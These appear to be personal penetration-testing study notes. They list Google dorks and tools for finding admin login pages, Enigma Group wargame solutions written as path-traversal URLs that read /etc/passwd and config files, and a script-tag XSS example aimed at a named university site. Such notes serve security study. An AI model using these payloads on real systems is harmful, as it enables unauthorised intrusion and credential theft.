CEH2
CEH2
CEH2
www.website.com/robots.txt
3) Google dorks searching
site:website.com login (you can change the keyword to admin, administrator or some
thing similar)
site:website.com inurl:login (same implies here)
site:website.com intitle: admin login (same implies here with the keywords)
ex: edu inurl:login
4) Using the Yashar shahinzadeh admin page finder
http://y-shahinzadeh.ir/af
5) Using the Havij Tool
SARANG's ECSA:
1) Explore source code for files and directory paths, comments, etc..
2) Use robots.txt for exploring directory listing.
https://www.owasp.org/index.php/Testing_for_Cross_site_scripting
audit discovery 4
http://www.enigmagroup.org/missions/basics/auditing/4/?page=../../../../../../..
/../../../google.com
(LFI works but RFI does not)
http://www.enigmagroup.org/missions/basics/auditing/4/?page=../../../../../../..
/../../../http://google.com
audit disc 5
http://www.enigmagroup.org/missions/basics/auditing/5/?file=config.php
audit discf 6: see command injection in url
realistic 1:
nmap reveals it is linux based as using 8080: apache server.
hence:
http://www.enigmagroup.org/missions/realistics/1/?page=../../../../../../../../.
./../../../../../../etc/passwd
buffer overflow to reveal passwd file.
http://www.enigmagroup.org:1337/ as nmap reveals it is a waste port..may be cust
oimized for login so exploit it.
use john the ripper to reveal passwords.
DOM(Document Object model) based XSS vul : DOM xss scanner online tool
Xss vul ex.
Instead of
http://scmhrd.edu/eventgallery.php?eventyear=2013&eventname=Prayatna
write this:
http://scmhrd.edu/eventgallery.php?eventyear=2013&eventname=<script>alert("Hello
")</script>